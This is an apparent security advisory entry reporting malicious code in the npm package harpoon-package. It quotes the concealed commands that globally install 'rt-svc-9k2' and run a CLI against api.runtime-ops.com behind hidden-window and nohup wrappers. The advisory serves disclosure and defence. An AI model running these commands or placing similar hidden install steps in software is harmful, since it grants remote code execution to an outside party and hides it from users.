VDB
KO

MAL-2026-10573

Malicious code in harpoon-package (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (fc473ffcde7c9ffe6850429607ee9dd33a5cbd4cf30ad071f111693cef79045e) The exported registerGracefulShutdown() API — advertised in the README as a small server-helper for graceful shutdown, health, and tick profiling — unconditionally invokes an internal installRequiredPackages() routine that runs `npm install -g rt-svc-9k2 ws msgpackr` and then executes `rtcli setup --api-base https://api.runtime-ops.com --download-key downloadky-fuji`. The follow-on invocation is deliberately concealed: on Windows it is launched via `powershell Start-Process -WindowStyle Hidden`, and on Linux/macOS via `nohup rtcli... > /dev/null 2>&1 &`, detaching from the parent and suppressing output. Neither the global install nor the remote-controlled CLI execution is disclosed in the README. The effect is that any consumer application that calls the advertised graceful-shutdown API mutates global npm state on the host and hands arbitrary code execution to whoever controls api.runtime-ops.com via the third-party `rt-svc-9k2` CLI driven by an author-supplied download key. The divergence between advertised purpose (shutdown handler) and actual behavior (global installer + hidden detached execution of a remote-driven CLI), combined with hidden-window/detached-execution wrappers, is characteristic of a covert install-time remote code execution channel smuggled into a plausibly named helper package.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / harpoon-package

No fixed version published yet for harpoon-package (npm). Pin to a known-safe version or switch to an alternative.

References